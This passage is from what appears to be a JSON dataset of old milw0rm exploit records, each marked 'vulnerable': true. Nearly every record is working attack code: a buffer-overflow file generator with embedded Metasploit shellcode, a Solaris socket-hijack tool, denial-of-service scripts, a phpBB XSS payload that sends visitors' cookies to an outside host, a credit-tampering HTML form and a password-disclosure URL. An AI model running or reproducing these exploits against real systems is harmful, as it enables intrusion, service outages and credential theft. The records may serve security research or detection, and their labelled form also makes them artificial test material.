metasploit shellc0de wow!!! LPORT=4444 Size=399  \n\n     unsigned char shellcode[] =\n\n\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x4f\\x85\"\n\n\"\\x2f\\x98\\x83\\xeb\\xfc\\xe2\\xf4\\xb3\\x6d\\x79\\x98\\x4f\\x85\\x7c\\xcd\\x19\"\n\n\"\\xd2\\xa4\\xf4\\x6b\\x9d\\xa4\\xdd\\x73\\x0e\\x7b\\x9d\\x37\\x84\\xc5\\x13\\x05\"\n\n\"\\x9d\\xa4\\xc2\\x6f\\x84\\xc4\\x7b\\x7d\\xcc\\xa4\\xac\\xc4\\x84\\xc1\\xa9\\xb0\"\n\n\"\\x79\\x1e\\x58\\xe3\\xbd\\xcf\\xec\\x48\\x44\\xe0\\x95\\x4e\\x42\\xc4\\x6a\\x74\"\n\n\"\\xf9\\x0b\\x8c\\x3a\\x64\\xa4\\xc2\\x6b\\x84\\xc4\\xfe\\xc4\\x89\\x64\\x13\\x15\"\n\n\"\\x99\\x2e\\x73\\xc4\\x81\\xa4\\x99\\xa7\\x6e\\x2d\\xa9\\x8f\\xda\\x71\\xc5\\x14\"\n\n\"\\x47\\x27\\x98\\x11\\xef\\x1f\\xc1\\x2b\\x0e\\x36\\x13\\x14\\x89\\xa4\\xc3\\x53\"\n\n\"\\x0e\\x34\\x13\\x14\\x8d\\x7c\\xf0\\xc1\\xcb\\x21\\x74\\xb0\\x53\\xa6\\x5f\\xce\"\n\n\"\\x69\\x2f\\x99\\x4f\\x85\\x78\\xce\\x1c\\x0c\\xca\\x70\\x68\\x85\\x2f\\x98\\xdf\"\n\n\"\\x84\\x2f\\x98\\xf9\\x9c\\x37\\x7f\\xeb\\x9c\\x5f\\x71\\xaa\\xcc\\xa9\\xd1\\xeb\"\n\n\"\\x9f\\x5f\\x5f\\xeb\\x28\\x01\\x71\\x96\\x8c\\xda\\x35\\x84\\x68\\xd3\\xa3\\x18\"\n\n\"\\xd6\\x1d\\xc7\\x7c\\xb7\\x2f\\xc3\\xc2\\xce\\x0f\\xc9\\xb0\\x52\\xa6\\x47\\xc6\"\n\n\"\\x46\\xa2\\xed\\x5b\\xef\\x28\\xc1\\x1e\\xd6\\xd0\\xac\\xc0\\x7a\\x7a\\x9c\\x16\"\n\n\"\\x0c\\x2b\\x16\\xad\\x77\\x04\\xbf\\x1b\\x7a\\x18\\x67\\x1a\\xb5\\x1e\\x58\\x1f\"\n\n\"\\xd5\\x7f\\xc8\\x0f\\xd5\\x6f\\xc8\\xb0\\xd0\\x03\\x11\\x88\\xb4\\xf4\\xcb\\x1c\"\n\n\"\\xed\\x2d\\x98\\x5e\\xd9\\xa6\\x78\\x25\\x95\\x7f\\xcf\\xb0\\xd0\\x0b\\xcb\\x18\"\n\n\"\\x7a\\x7a\\xb0\\x1c\\xd1\\x78\\x67\\x1a\\xa5\\xa6\\x5f\\x27\\xc6\\x62\\xdc\\x4f\"\n\n\"\\x0c\\xcc\\x1f\\xb5\\xb4\\xef\\x15\\x33\\xa1\\x83\\xf2\\x5a\\xdc\\xdc\\x33\\xc8\"\n\n\"\\x7f\\xac\\x74\\x1b\\x43\\x6b\\xbc\\x5f\\xc1\\x49\\x5f\\x0b\\xa1\\x13\\x99\\x4e\"\n\n\"\\x0c\\x53\\xbc\\x07\\x0c\\x53\\xbc\\x03\\x0c\\x53\\xbc\\x1f\\x08\\x6b\\xbc\\x5f\"\n\n\"\\xd1\\x7f\\xc9\\x1e\\xd4\\x6e\\xc9\\x06\\xd4\\x7e\\xcb\\x1e\\x7a\\x5a\\x98\\x27\"\n\n\"\\xf7\\xd1\\x2b\\x59\\x7a\\x7a\\x9c\\xb0\\x55\\xa6\\x7e\\xb0\\xf0\\x2f\\xf0\\xe2\"\n\n\"\\x5c\\x2a\\x56\\xb0\\xd0\\x2b\\x11\\x8c\\xef\\xd0\\x67\\x79\\x7a\\xfc\\x67\\x3a\"\n\n\"\\x85\\x47\\x68\\xc5\\x81\\x70\\x67\\x1a\\x81\\x1e\\x43\\x1c\\x7a\\xff\\x98\";\n\n    FILE *fp;  \n\n    char buffer[size];\n\n    unsigned int os;\n\n    char ppr[5];\n\n    char jmp[] = \"\\xEB\\x0C\\x90\\x90\";\n\n    char winxp[] = \"\\xB1\\x2C\\xC2\\x77\"; \n\n    char win2000[] =\"\\x08\\xB0\\x01\\x78\";\n\n    if(argc < 2) {\n\n    printf(\"\\n-------- Download Manager remote exploit\\n\");\n\n    printf(\"-------- copyrighted by c0d3r of IHS 2005\\n\");\n\n    printf(\"-------- usage : dlm.exe target\\n\");\n\n    printf(\"-------- target 1 : windows xp all service packs all languages : 0\\n\");\n\n    printf(\"-------- target 2 : windows 2000 all service packs all languages : 1\\n\");\n\n    printf(\"-------- eg : dlm.exe 0\\n\");\t\n\n    printf(\"-------- out file will be exploit.txt for windows xp\\n\\n\");\n\n    exit(-1) ;\n\n  } \n\n    os = (unsigned short)atoi(argv[1]); \t \n\n    switch(os)\n\n  {\n\n    case 0:\n\n    strcat(ppr,winxp);\n\n    break;\n\n    case 1:\n\n    strcat(ppr,win2000); \n\n    break;\n\n    default:\n\n    printf(\"\\n[-] this target doesnt exist in the list\\n\\n\");\n\n   \n\n    exit(-1);\n\n  }\n\n   printf(\"\\n-------- Download Manager remote exploit\\n\");\n\n   printf(\"-------- copyrighted by c0d3r of IHS 2005\\n\");\n\n   \n\n    // heart of exploit\n\n   \n\n    printf(\"-------- building overflow string\\n\");\n\n    memset(buffer,NOP,size);\n\n    memcpy(buffer,crap4,sizeof(crap4)-1);\n\n\tmemcpy(buffer+3+2077,jmp,4);\n\n\tmemcpy(buffer+3+2077+4,ppr,4);\n\n\tmemcpy(buffer+3+2077+4+40,shellcode,sizeof(shellcode)-1);\n\n\tbuffer[size] = 0;\n\n  \n\n\t/*\n\n    memcpy(buffer,crap1,sizeof(crap1)-1);\n\n\tmemcpy(buffer+122,crap4,sizeof(crap4)-1);\n\n    memcpy(buffer+2192,jmp,4);\n\n    memcpy(buffer+2196,ppr,4);\n\n    memcpy(buffer+2200,shellcode,sizeof(shellcode)-1);\n\n    memcpy(buffer+2599,crap2,sizeof(crap2)-1);\n\n    memcpy(buffer+2601,crap3,sizeof(crap3)-1);\n\n    buffer[size] = 0;\n\n    */\n\n\t\n\n    // EO heart of exploit  \n\n     \n\n\tprintf(\"-------- Done !\\n\");\n\n    printf(\"-------- Creating the exploit.txt file\\n\");\n\n    fp = fopen(exploit, \"w+\");\n\n    fwrite(buffer, sizeof ( unsigned char ), sizeof(buffer), fp);\n\n    fclose(fp);\n\n    printf(\"-------- Done ! enjoy it !\\n\");\n\n    return 0;\n\n\n\n}\n\n\n\n// milw0rm.com [2005-07-06]",
500        "vulnerable": true
501    },
502    {
503        "exploit_id": 1092,
504        "content": "/*\n\n  *****************************************************************************************************************\n\n  $ An open security advisory #7 - SUN Solaris SO_REUSEADDR Local Socket Hijack Bug\n\n  *****************************************************************************************************************\n\n  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com\n\n  2: Bug Released: July 06 2005\n\n  3: Bug Impact Rate: Medium / Hi\n\n  4: Bug Scope Rate: Local / Remote\n\n  *****************************************************************************************************************\n\n  $ This advisory and/or proof of concept code must not be used for commercial gain.\n\n  *****************************************************************************************************************\n\n\n\n  Sun MicroSystems\n\n  http://www.sun.com\n\n\n\n  Solaris has a bug in the use of SO_REUSEADDR in that the Kernel favours any socket binding operation that\n\n  is more specific than the general \"*.*\" wildcard bind(). As such, a malicious socket can bind to an already\n\n  bound interface if a specific IP address is used.\n\n\n\n  This hijack can be performed against any process over 1024, including root owned services, it is not limited\n\n  to your own user account. One can then mimic the original service and snoop usernames / passwords, files and\n\n  data with a trojan version of software, or just cause a DOS against the legitimate service, providing the\n\n  service is bound to a port above 1024 and uses the SO_REUSEADDR option.\n\n\n\n  Anyway, a work around could be setting the port numbers that are valuable to the system as privileged. Using\n\n  the following kernel parameter, you can set ports above 1024 to act as reserved so only root can bind to them.\n\n\n\n    tcp_extra_priv_ports_add\n\n\n\n  To view privileged ports, run the following command:\n\n\n\n    ndd /dev/tcp tcp_extra_priv_ports\n\n\n\n  To set ports as privileged, run the following command:\n\n\n\n    ndd -set /dev/tcp tcp_extra_priv_ports_add 8080\n\n\n\n  Effected: All Solaris versions.\n\n  Not effected: Linux, OpenBSD, FreeBSD, Windows.\n\n\n\n  SUN have released a patch for the issue which can be downloaded from sunsolve.\n\n\n\n  Document Audience:    PUBLIC\n\n  Document ID:    116965-08\n\n  Title:    Obsoleted by: 116965-09 SunOS 5.8: ip/arp/tcp/udp patch\n\n  Update Date:    Thu May 05 09:28:25 MDT 2005\n\n  See Patch Revision History\n\n\n\n  Patch Id: 116965-08\n\n\n\n  Problem Description:\n\n\n\n  5089150 Binding to a port which has already been bound may incorrectly succeed\n\n\n\n*/\n\n\n\n/* solsockjack.c */\n\n#include <stdlib.h>\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <unistd.h>\n\n#include <netinet/in.h>\n\n#include <sys/socket.h>\n\n#include <sys/types.h>\n\n#include <sys/utsname.h>\n\n#include <arpa/inet.h>\n\n\n\n#define BAD             \"!@#$%^&*()-_=+[]{};':\\\",/<>?\\\\|`~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n#define DEFHOST         \"localhost\"\n\n#define MAX_INCONN      1\n\n#define PORT            1241         /* Nessus */\n\n#define SYSTEM          \"SunOS\"\n\n\n\n#define BL              \"\\x1B[1;34m\"\n\n#define NO              \"\\x1B[0m\"\n\n#define PI              \"\\x1B[35m\"\n\n#define PU              \"\\x1B[1;35m\"\n\n#define RE              \"\\x1B[1;31m\"\n\n#define WH              \"\\x1B[1;37m\"\n\n#define YE              \"\\x1B[1;33m\"\n\n\n\nvoid\n\nbanner(void)\n\n{\n\n        fprintf(stderr, \"\\n%s[-] %sSUN Solaris SPARC / x86 Local Socket Hijack Exploit\\n\", YE, NO);\n\n        fprintf(stderr, \"%s[-] %sKernel issue allows a bind on an already bound socket\\n\", YE, NO);\n\n        fprintf(stderr, \"%s[-] %sallowing a malicious user to impersonate a service that\\n\", YE, NO);\n\n        fprintf(stderr, \"%s[-] %sis already running on a port greater than 1024, making\\n\", YE, NO);\n\n        fprintf(stderr, \"%s[-] %sservice-in-the-middle attacks a trivial task to perform.\\n\", YE, NO);\n\n        fprintf(stderr, \"%s[-] %sDeveloped by c0ntex || c0ntexb@gmail.com%s\\n\\n\", YE, WH, NO);\n\n\n\n        _exit(EXIT_SUCCESS);\n\n}\n\n\n\nvoid\n\nusage(int argc, char **argv)\n\n{\n\n        fprintf(stderr, \"%s[-] %s Usage:\\n\", YE, NO);\n\n        fprintf(stderr, \"%s[-] %s\\t -h \\t\\tIP address to bind socket to\\n\", YE, NO);\n\n        fprintf(stderr, \"%s[-] %s\\t -p \\t\\tport number to attempt hijack of\\n\", YE, NO);\n\n        fprintf(stderr, \"%s[-] %s\\t -v \\t\\tPrints this help\\n\", YE, NO);\n\n\n\n        fprintf(stderr, \"%s[-] %s%s -h 10.1.1.215 -p 1241\\n\\n\", YE, NO, argv[0]);\n\n\n\n        _exit(EXIT_FAILURE);\n\n}\n\n\n\nvoid\n\ncheckerr(char *isvuln)\n\n{\n\n        free(isvuln);\n\n        puts(\"Not today!\");\n\n        _exit(EXIT_FAILURE);\n\n}\n\n\n\nvoid\n\njackerr(char *vulnerable)\n\n{\n\n        free(vulnerable);\n\n        _exit(EXIT_FAILURE);\n\n}\n\n\n\nchar\n\n*checksys(char *isvuln)\n\n{\n\n        struct utsname name;\n\n\n\n        if(uname(&name) < 0) {\n\n                puts(\"uname failed\");\n\n        }\n\n\n\n        isvuln = malloc(6);\n\n        if(!isvuln) {\n\n                perror(\"malloc\");\n\n                _exit(EXIT_FAILURE);\n\n        }\n\n\n\n        if((name.sysname == NULL) || (strlen(name.sysname) < 1) || (strlen(name.sysname) > 5)) {\n\n                checkerr(isvuln);\n\n        }\n\n\n\n        memcpy(isvuln, name.sysname, strlen(name.sysname));\n\n        if(!isvuln) {\n\n                checkerr(isvuln);\n\n        }\n\n\n\n        return(isvuln);\n\n}\n\n\n\nint\n\nmain(int argc, char **argv)\n\n{\n\n        int inbuf, jacksock, opts, solvuln;\n\n        int port = PORT;\n\n\n\n        char *vulnerable = NULL;\n\n        char *systype = NULL;\n\n        char *isvuln = NULL;\n\n        char *bad = NULL;\n\n\n\n        struct sockaddr_in solaris, victims;\n\n\n\n        if(argc < 2) {\n\n                banner();\n\n                _exit(EXIT_FAILURE);\n\n        }\n\n\n\n        if((systype = checksys(isvuln)) == NULL) {\n\n                puts(\"Something messed up!\");\n\n                checkerr(isvuln);\n\n        }\n\n\n\n        if(strcmp(SYSTEM, systype) != 0) {\n\n                puts(\"System is not supported - SunOS only!\");\n\n                checkerr(isvuln);\n\n        }\n\n\n\n        fprintf(stderr, \"\\n%s-> %sOK, potential vulnerable %s[%s] %ssystem, continuing..\\n\", WH, NO, BL, systype, NO);\n\n\n\n        free(isvuln); sleep(2);\n\n\n\n        while((opts = getopt(argc, argv, \"h:p:v\")) != -1) {\n\n                switch(opts)\n\n                        {\n\n                        case 'h':\n\n                                bad = BAD;\n\n                                vulnerable = malloc(16);\n\n                                if(!vulnerable) {\n\n                                        perror(\"malloc\");\n\n                                        _exit(EXIT_FAILURE);\n\n                                }\n\n\n\n                                if((optarg == NULL) || (strlen(optarg) < 7) || (strlen(optarg) > 15) || strpbrk(bad, optarg)) {\n\n                                        puts(\"\\n[-] Failed: IP address just isn't right!\\n\");\n\n                                        jackerr(vulnerable);\n\n                                }\n\n\n\n                                memcpy(vulnerable, optarg, strlen(optarg));\n\n                                if(!vulnerable) {\n\n                                        jackerr(vulnerable);\n\n                                }\n\n                                break;\n\n                        case 'p':\n\n                                port = atoi(optarg);\n\n                                if((port < 1024) || (port > 65535)) {\n\n                                        puts(\"\\n[-] Failed: Port number just isn't right!\\n\");\n\n                                        usage(argc, argv);\n\n                                        _exit(EXIT_FAILURE);\n\n                                }\n\n                                break;\n\n                        case 'v':\n\n                                usage(argc, argv);\n\n                                break;\n\n                        default:\n\n                                usage(argc, argv);\n\n                                break;\n\n                        }\n\n        }\n\n\n\n        if(vulnerable == NULL) {\n\n                jackerr(vulnerable);\n\n        }\n\n\n\n        fprintf(stderr, \"%s-> %sJacking port %s[%d] %sat address %s[%s]%s\\n\", WH, NO, PI, port, NO, PU, vulnerable, NO);\n\n\n\n        jacksock = socket(AF_INET, SOCK_STREAM, 0);\n\n        if(jacksock < 0) {\n\n                perror(\"socket\");\n\n                jackerr(vulnerable);\n\n        } sleep(2);\n\n\n\n        if(setsockopt(jacksock, SOL_SOCKET, SO_REUSEADDR, &solvuln, sizeof(int)) < 0) {\n\n                perror(\"setsockopt\");\n\n        }\n\n\n\n        solaris.sin_family = AF_INET;\n\n        solaris.sin_port = htons(port);\n\n        solaris.sin_addr.s_addr = inet_addr(vulnerable);\n\n        memset(&solaris.sin_zero, '\\0', sizeof(solaris.sin_zero));\n\n\n\n        if(bind(jacksock, (struct sockaddr *)&solaris, sizeof(struct sockaddr)) < 0) {\n\n                perror(\"bind\");\n\n                fprintf(stderr, \"[-] %sFailed: %sCould not snag port, must be patched!\\n\", RE, NO);\n\n                jackerr(vulnerable);\n\n        }\n\n\n\n        fprintf(stderr, \"%s-> %s%sSuccess!! %sPort %s[%d] %shas been hijacked!\\n%s-> %sWait...\\n\", WH, NO, YE, NO, PI, port, NO, WH, NO);\n\n\n\n        if(listen(jacksock, MAX_INCONN) < 0) {\n\n                perror(\"listen\");\n\n                puts(\"[-] Failed: Could not listen for an incoming connection!\");\n\n                jackerr(vulnerable);\n\n        } sleep(2);\n\n\n\n        fprintf(stderr, \"%s-> %sOK, listening for incoming connections to compromise\", WH, NO);\n\n\n\n        inbuf = sizeof(victims);\n\n\n\n        if(accept(jacksock, (struct sockaddr *)&victims, &inbuf) < 0) {\n\n                perror(\"accept\");\n\n                puts(\"[-] Failed: Could not accept the incoming connection!\");\n\n                jackerr(vulnerable);\n\n        }\n\n\n\n        fprintf(stderr, \"\\n%s-> %sSnagged a victim connecting from %s[%s]%s\\n\", WH, NO, YE, inet_ntoa(victims.sin_addr), NO);\n\n\n\n        sleep(1);\n\n\n\n        close(jacksock);\n\n\n\n        puts(\"-> Victim has been released to live another day!\");\n\n\n\n        sleep(1);\n\n\n\n        puts(\"-> Test was a success!\");\n\n\n\n        free(vulnerable);\n\n\n\n        return(0);\n\n}\n\n\n\n// milw0rm.com [2005-07-06]",
505        "vulnerable": true
506    },
507    {
508        "exploit_id": 1093,
509        "content": "/*\n\n\n\n   PrivaShare TCP/IP DoS Exploit\n\n----------------------------------------\n\n\n\nResolve host... [OK]\n\n [+] Connecting... [OK]\n\nTarget locked\n\nSending bad procedure... [OK]\n\n [+] Server DoS'ed\n\n\n\n Tested on Windows2000 SP4\n\n Greats: Infam0us Gr0up Team/member,and ll of u..take care!\n\n\n\n Info:\n\n - infamous.2hell.com\n\n - basher13@linuxmail.org\n\n\n\n*/\n\n\n\n#include <string.h>\n\n#include <winsock2.h>\n\n#include <stdio.h>\n\n\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n\n\nchar doscore[] =\n\n/*\n\n\n\n        Offset 0000ca10 to 0000ca2b\n\n\n\n0000ca10 6c 00 69 00 73 00 74 00 4f 00 66 00 43 00\n\n6f 00 6e 00 74 00 61 00 63 00 74 00 73 00\n\n\n\nHEX:\n\n6c 20 69 20 73 20 74 20 4f 20 66 20 43 20 6f 20 6e 20 74\n\n20 61 20 63 20 74\n\n\n\n\n\n*/\n\n\"listOfContacts,null\"\n\n\"***          PrivaShare TCP/IP DoS Exploit        \\n\"\n\n\"***-----------------------------------------------\\n\"\n\n\"***   Infam0us Gr0up - Securiti Research Team     \\n\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\";\n\n\n\n\n\n\n\nint main(int argc, char *argv[])\n\n{\n\nWSADATA wsaData;\n\nWORD wVersionRequested;\n\nstruct hostent *pTarget;\n\nstruct sockaddr_in sock;\n\nchar *target;\n\nint port,bufsize;\n\nSOCKET inetdos;\n\n\n\nif (argc < 2)\n\n{\n\nprintf(\"        PrivaShare TCP/IP DoS Exploit \\n\", argv[0]);\n\nprintf(\"  ------------------------------------------\\n\", argv[0]);\n\nprintf(\"      Infam0us Gr0up - Securiti Research\\n\\n\", argv[0]);\n\nprintf(\"[-]Usage: %s [target] [port]\\n\", argv[0]);\n\nprintf(\"[?]Exam: %s localhost 2001\\n\", argv[0]);\n\nexit(1);\n\n}\n\n\n\nwVersionRequested = MAKEWORD(1, 1);\n\nif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\n\n\n\ntarget = argv[1];\n\nport = 2001;\n\n\n\nif (argc >= 3) port = atoi(argv[2]);\n\nbufsize = 1024;\n\nif (argc >= 4) bufsize = atoi(argv[3]);\n\n\n\ninetdos = socket(AF_INET, SOCK_STREAM, 0);\n\nif(inetdos==INVALID_SOCKET)\n\n{\n\nprintf(\"Socket ERROR \\n\");\n\nexit(1);\n\n}\n\nprintf(\"        PrivaShare TCP/IP DoS Exploit \\n\", argv[0]);\n\nprintf(\"  ------------------------------------------\\r\\n\\n\", argv[0]);\n\nprintf(\"Resolve host... \");\n\nif ((pTarget = gethostbyname(target)) == NULL)\n\n{\n\nprintf(\"FAILED \\n\", argv[0]);\n\nexit(1);\n\n}\n\nprintf(\"[OK]\\n \");\n\nmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\n\nsock.sin_family = AF_INET;\n\nsock.sin_port = htons((USHORT)port);\n\n\n\nprintf(\"[+] Connecting... \");\n\nif ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))\n\n{\n\nprintf(\"FAILED\\n\");\n\nexit(1);\n\n}\n\nprintf(\"[OK]\\n\");\n\nprintf(\"Target locked\\n\");\n\nprintf(\"Sending bad procedure... \");\n\nif (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)\n\n{\n\nprintf(\"ERROR\\n\");\n\nclosesocket(inetdos);\n\nexit(1);\n\n}\n\nprintf(\"[OK]\\n \");\n\nprintf(\"[+] Server DoS'ed\\n\");\n\nclosesocket(inetdos);\n\nWSACleanup();\n\nreturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-07-07]",
510        "vulnerable": true
511    },
512    {
513        "exploit_id": 1094,
514        "content": "#!/usr/bin/perl\n\n\n\nuse IO::Socket;\n\n\n\nif (@ARGV <2)\n\n {\n\n  print \"\\n ::: ---------------------------------------------- :::\\n\";\n\n  print \" ::: AnalogX SimpleServer WWW 1.05 Dos Exploit     :::\\n\";\n\n  print \" :::                                                :::\\n\";\n\n  print \" ::: Advisory : http://www.ussrback.com/labs45.html :::\\n\";\n\n  print \" ::: By       : Qnix  - Qnix[at]bsdmail[dot]org     :::\\n\";\n\n  print \" :::                                                :::\\n\";\n\n  print \" ::: Usage:  analogx_dos.pl [ip] [port]             :::\\n\";\n\n  print \" ::: ---------------------------------------------- :::\\n\";\n\n  exit();\n\n }\n\n\n\n$buf=\"A\"x4500;\n\nprint \"\\n <+> Prepare to start connect.\\n\";\n\nsleep(1);\n\n$s = IO::Socket::INET->new(Proto=>\"tcp\",\n\n                           PeerAddr=>$ARGV[0],\n\n                           PeerPort=>$ARGV[1],\n\n                           Timeout=>6\n\n                           ) or die \" <-> Target web server already DoSeD ??? or can't connect :(\\n\\n\";\n\n $s->autoflush();\n\n\n\nprint \" <+> Connected to $ARGV[0]:$ARGV[1]\\n\";\n\nsleep(1);\n\nprint \" <+> Sending the devil shit.\\n\";\n\nsleep(1);\n\nprint $s \"GET /$buf HTTP/1.1\\n\";\n\n\n\nprint \" <+> Prepare to DoS with AAAAAA's .\\n\";\n\nsleep(1);\n\nclose($s);\n\n\n\nprint \" <+> Ok now target web server maybe DoSeD.\\n\\n\";\n\n\n\n# milw0rm.com [2005-07-07]",
515        "vulnerable": true
516    },
517    {
518        "exploit_id": 1095,
519        "content": "/*\n\n1) Change milw0rm.com to your domain.com\n\n2) Post the below code into a new message.\n\n\n\nExample Output:\n\n***.**.***.*** - - [09/Jul/2005:03:09:13 -0500] \n\n\"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1\" 404 305 \"http://tester/phpBB2/viewtopic.php?t=3\"\n\n\n\n/str0ke\n\n*/\n\n\n\n\n\n******************************************************************************************************\n\n*\t\t\t\t\tCCTEAM PhpBB 2.0.16 XSS EXPLOIT                              *\n\n*                                           Powered by D|ablo CCTEAM                                 *\n\n******************************************************************************************************\n\n[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]\n\n\n\n******************************************************************************************************\n\n*\t\t\t\t               http://ccteam.ru/                                     *\n\n*                                             http://defacers.ru/                                    *\n\n******************************************************************************************************\n\n\n\n# milw0rm.com [2005-07-08]",
520        "vulnerable": true
521    },
522    {
523        "exploit_id": 1096,
524        "content": "Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).\n\nTitle: Hosting controller program have a security bug in \"AccountActions.asp\" that an authenticated \n\nuser can change his/her credit and buy some services!\n\n\n\nVersion: 6.1 HotFix 2.1 and older\n\nDeveloper url: hostingcontroller.com\n\nComment: Hosting Controller is an application to manage a host.\n\nExploit code to proof:\n\n--------------------------------\n\nGET CREDIT<br>Soroush Dalili from GSG<br>\n\n<form action=\"http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit\" method=\"post\">\n\n<table>\n\n<tr>\n\n<td>Username:</td>\n\n<td><input type=\"text\" name=\"UserName\" value=\"\"></td>\n\n</tr>\n\n<tr>\n\n<td>Description:</td>\n\n<td><input type=\"text\" name=\"Description\" value=\"\"></td>\n\n</tr>\n\n<tr>\n\n<td>FullName:</td>\n\n<td><input type=\"text\" name=\"FullName\" value=\"\"></td>\n\n</tr>\n\n<tr>\n\n<td>AccountDisabled 1,[blank]:</td>\n\n<td><input type=\"text\" name=\"AccountDisabled\" value=\"\"></td>\n\n</tr>\n\n<tr>\n\n<td>UserChangePassword:</td>\n\n<td><input type=\"text\" name=\"UserChangePassword\" value=\"\"></td>\n\n</tr>\n\n<tr>\n\n<td>PassCheck=TRUE,0:</td>\n\n<td><input type=\"text\" name=\"PassCheck\" value=\"0\"></td>\n\n</tr>\n\n<tr>\n\n<td>New Password:</td>\n\n<td><input type=\"text\" name=\"Pass1\" value=\"\"></td>\n\n</tr>\n\n<tr>\n\n<td>DefaultDiscount%:</td>\n\n<td><input type=\"text\" name=\"DefaultDiscount\" value=\"100\"></td>\n\n</tr>\n\n<tr>\n\n<td>CreditLimit:</td>\n\n<td><input type=\"text\" name=\"CreditLimit\" value=\"99999\"></td>\n\n</tr>\n\n</table>\n\n<br><input type=\"submit\">\n\n</form>\n\n<hr><br>\n\n\n\n# milw0rm.com [2005-07-10]",
525        "vulnerable": true
526    },
527    {
528        "exploit_id": 1097,
529        "content": "# Edited for easy info. /str0ke\n\n\n\nSoftware:    BlogTorrent 0.92 <=\n\nVendor:      http://www.blogtorrent.com/\n\nAuthor:      LazyCrs && pjphem\n\nDate:        10/07/2005\n\nType:        Remote/Local User Password Disclosure\n\n\n\n#0x03 - POC\n\n\n\nhttp://test/path_of_blog/data/newusers\n\n=\n\nd40:14ae696abdca1688dd577fe486c3981f331457b0d7:Createdi1120957648e5:Email17:email@email4:Hash40:d7b82821fe725305bded2fab9e91ed1e0e6fd93bee\n\n\n\nUsername (crypt in md5) ->  14ae696abdca1688dd577fe486c3981f331457b0d7\n\nPassword  (crypt in md5) ->  d7b82821fe725305bded2fab9e91ed1e0e6fd93bee\n\n\n\n#LazyCrs[AT]GMail[DOT]com - pjphem[AT]mybox[DOT]it\n\n#FREE RAFA! FREE RAFA! FREE RAFA!\n\n\n\n# milw0rm.com [2005-07-11]",
530        "vulnerable": true
531    },
532    {
533        "exploit_id": 1099,
534        "content": "#!/bin/perl\n\n#\n\n#     Baby Web Server Command Validation Exploit\n\n# --------------------------------------------------\n\n#        Infam0us Gr0up - Securiti Research\n\n#\n\n#\n\n# E:\\>nc -v localhost 80\n\n# Infam0us-Gr0up [127.0.0.1] 80 (http) open\n\n# GET HTTP\n\n#\n\n# HTTP/1.0 400 Bad Request\n\n# Server: Baby Web Server < --\n\n# Set-Cookie: SESSIONID=00000001; path=/;version=1\n\n# Last-Modified: Tue, 12 Jul 2005 06:43:05 GMT\n\n#\n\n#\n\n# E:\\PERL>perl babyws.pl localhost test.txt E:\\Website\\www04\\ad\\index.html\n\n#\n\n# [+] Connecting to localhost..\n\n# [+] Connected\n\n# [+] Create Spl0it..\n\n# [+] Sending Command Validation..\n\n# [+] Now attacking..\n\n# [+] Domain: localhost\n\n# [+] Path:E: E:\\Website\\www04\\ad\\index.html\n\n# [+] 0wned!\n\n#\n\n# Tested on Windows2000 SP4 (Win NT)\n\n# Info : basher13@linuxmail.org / infamous.2hell.com\n\n# Vendor URL: http://www.pablosoftwaresolutions.com/\n\n\n\n\n\nuse IO::Socket;\n\nif(@ARGV!=3){\n\nprint \"    Baby Web Server Command Validation Exploit \\n\";\n\nprint \"----------------------------------------------------\\n\";\n\nprint \"     Infam0us Gr0up - Securiti Research\\n\\n\";\n\nprint \"[-]Usage: babyws.pl [target] [input] [path_file]\\n\";\n\nprint \"[?]Exam:  babyws.pl localhost test.txt e:\\www\\site01\\default.htm\\n\\n\";\n\nexit(1);\n\n}\n\n\n\n$site = $ARGV[0];\n\n\n\nmy $infile = $ARGV[1];\n\nmy $path = $ARGV[2];\n\n\n\nprint \"\\n\\n\";\n\nprint \"[+] Connecting to $site..\\n\";\n\n\n\n$sock = IO::Socket::INET->new(\n\nPeerAddr => \"$ARGV[0]\",\n\nPeerPort => 80,\n\nProto => \"tcp\")\n\nor die \"Unable to connect\";\n\n\n\nprint 